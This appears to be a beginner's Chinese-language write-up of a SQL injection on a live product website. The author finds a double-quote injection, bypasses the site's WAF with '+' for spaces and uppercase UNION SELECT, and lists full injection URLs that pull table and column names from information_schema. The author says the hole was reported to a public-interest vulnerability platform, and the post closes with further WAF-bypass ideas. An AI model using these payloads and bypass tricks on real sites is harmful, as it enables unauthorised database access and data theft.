本人也是小白一枚,大佬請繞過,這個其實是六月份的時候做的,那時候想多點實戰經驗,就直接用谷歌搜索找了一些網站,這個是其中一個
1、目標網站
2、發現有WAF防護
3、判斷存在注入
4、猜測了一下閉合為",果真是"閉合,而且沒有觸發WAF,感覺還挺幸運的
5、嘗試使用 order by判斷當前數據庫的字段數為20,本來以為WAF會攔截,發現也沒有攔截
6、判斷顯示位,這次直接被攔截了
7、繞WAF,通過使用(+)代替空格的方法繞過WAF的攔截,并大寫UNION SELECT,判斷出顯錯點為5和10
8、查詢數據庫用戶名和數據庫名
9、查詢當前數據庫表名,列名
查詢表名 http://www.****.com/product.php?sid=80&id=-218%27+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
+from+information_schema.tables+where+table_schema=database()+%23
查詢列名 http://www.****.com/product.php?sid=80&id=-218%27+UNION+SELECT+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
+from+information_schema.columns+where+table_name=%27s1_ad1%27+limit+1,1%20+%23
點到為止嘛沒有繼續下去了,然后直接交公益src了,其實顯錯點10也可以同顯錯點5一樣的操作查詢處庫名表名列名到最后的字段內容,還可以用group_concat()這個函數查詢出多個數據庫名,不過試了一下WAF攔截了,可以嘗試替換等價函數或者其他方法啊應該也是可以繞過WAF的,不行的話,也可以嘗試用burp抓包跑出表名,列名,字段名